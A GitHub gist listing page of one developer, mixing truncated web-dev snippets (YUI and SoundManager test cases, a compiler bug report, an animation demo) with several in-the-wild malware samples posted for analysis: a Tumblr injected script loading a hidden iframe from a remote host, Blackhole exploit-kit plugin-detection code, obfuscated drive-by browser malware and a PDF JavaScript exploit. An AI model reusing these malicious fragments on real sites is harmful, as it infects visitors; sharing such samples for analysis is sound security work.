Scott Schiller scottschiller

@scottschiller
scottschiller / gist:4196142
Created Dec 3, 2012
Possible Tumblr exploit found in the wild, 12/03/2012
View gist:4196142
<div class="the-video hideflash"><script src="data:text/plain;base64,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"></script><iframe id="lapper" width="0" height="0" style="opacity: 0;"></iframe></div>
Decoded:
/*
var framekiller = true;
window.onload = function(){
document.getElementById('lapper').src = "http://i.hope.you.get.st
@scottschiller
scottschiller / malware.js
Created Nov 15, 2012
"Blackhole" Flash + Adobe PDF Reader + Java/getJavaInfo.jar web exploit found in the wild, 11/15/2012
View malware.js
/**
* Looks as though this thing scans for vulnerable versions of Flash, Adobe PDF Reader and Java plugins.
* Oddly, the functions j1/j2/p1/p2/f1/f2 (which would presumably do the dirty work) are empty.
* It's worth noting that the hosting (bad) page says "Please wait, you will be forwarded / IE and Firefox-compatible only".
* Allegedly this is part of the "Blackhole Exploit Kit".
* Related details / video etc.:
* http://malwaremustdie.blogspot.com/2012/09/important-blackhole-exploit-kit-starts.html
* http://malware.dontneedcoffee.com/2012/09/BHEK2.0landing.html
*/
View gist:2890589
<!-- Flickr is made of, by and for humans: Here are 17 signs of empathy in the form of loading messages. ;) -->
Reticulating splines...
Frobulating widgets...
Engaging Tuna Blaster...
Firing up the engines...
Buffering...
Herding pandas...
Questioning the Magic Donkey...
Your machine is learning our ways
@scottschiller
scottschiller / yui3-loader-test.html
Created May 8, 2012
YUI 3.5.1 loader test (IE 9, quirks mode DTD)
View yui3-loader-test.html
<!--
Lack of DTD means quirks mode in IE 9, and YUI 3.5.1 will fail to load module dependencies due to <script>.onload not being supported. <script>.onreadystatechange should instead be used when document.documentMode < 9, which means IE 9 rendering a page in quirks mode, IE 7 or IE 8 standards mode.
-->
<html>
<head>
<script src="http://yui.yahooapis.com/3.5.1/build/yui/yui-min.js"></script>
<script>
// Create a YUI sandbox on your page.
YUI().use('node', 'event', function (Y) {
// The Node and Event modules are loaded and ready to use.
@scottschiller
scottschiller / gist:2623390
Created May 6, 2012 — forked from spadgos/gist:2561726
Recreating a SoundManager bug / fixed testcase
View gist:2623390
<html>
<head>
<!--
report URL: https://getsatisfaction.com/schillmania/topics/sound_playing_double
related SM2 fix/commit: https://github.com/scottschiller/SoundManager2/commit/013565dbb5abfc5bf0ab66b0246352ee3ca5cc02
-->
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Soundmanager test</title>
<!-- you'll have to correct the paths to SoundManager to get it working for yourself -->
<script>window.SM2_DEFER = true;</script>
@scottschiller
scottschiller / gist:2142215
Created Mar 20, 2012
JavaScript PDF exploit found in the wild, 03/20/2012
View gist:2142215
I got this PDF as an email attachment.
The PDF file included a JavaScript block defining an array, and some encoded (for example, &#123;) character entries underneath defining the function responsible for decoding and running it.
The interesting part of the PDF where the script started:
<test:script contentType='&#97;&#0112;plication/&#120;-javascript'>
That was followed by the array data (not encoded), and then this block:
@scottschiller
scottschiller / malware.html
Created Feb 28, 2012
Browser malware found in the wild, 02/28/2012
View malware.html
<!-- Fake "Better Business Bureau" email had a link going to a compromised site with obfuscated JS, which ultimately created an iFrame that loaded this on a remote domain with /main.php?page=[some_characters]. -->
<!-- Probably some drive-by exploit, don't run this on - er, well - anything - but especially not WinXP. -->
<!-- commented out to prevent accidental execution, too. -->
<html><body><script>
/*
ss='s';g='g';r='r';d='d';c='c';t='t';
try{new window(123).typ;}catch(qq){aa=/d/.exec("a"+"ds").index+[];e=window.eval;cc=document;}
aaa=1+[];
try{new btoa({});}catch(qqq){
@scottschiller
scottschiller / gist:1187837
Created Sep 2, 2011
Closure compiler "INTERNAL COMPILER ERROR" with soundmanager2-nodebug.js (Compiler version 1346)
View gist:1187837
[ Report for Google Closure Compiler folks, internal compiler error on routinely-compressed JS ]
Source file used:
https://raw.github.com/scottschiller/SoundManager2/V2.97a.20110801+DEV/script/soundmanager2-nodebug.js
Reporting this per instructions in the compiler output.
For what it's worth, compilation has previously been successful until I updated the compiler to the build below.
This version of the compiler fails:
Closure Compiler (http://code.google.com/closure/compiler)
@scottschiller
scottschiller / js-ball-collision.html
Created Jul 10, 2011
A collision-enabled variant of my JavaScript Animation Demo #2, feature added at the request of a public school technology teacher who wrote in. (Teachers showing kids JavaScript in high school FTW! :P)
View js-ball-collision.html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<style type="text/css">
body {
font:76% normal verdana,arial,tahoma;
}
@scottschiller
scottschiller / normalized-addremove.html
Created Sep 26, 2010
Somewhat-normalized event listener handling (DOM2)
View normalized-addremove.html
<html>
<head>
<title>Somewhat-normalized event add/remove</title>
<script>
var addEvent, removeEvent;
(function() {
/*
* Somewhat-normalized event add/remove (old IE/W3C)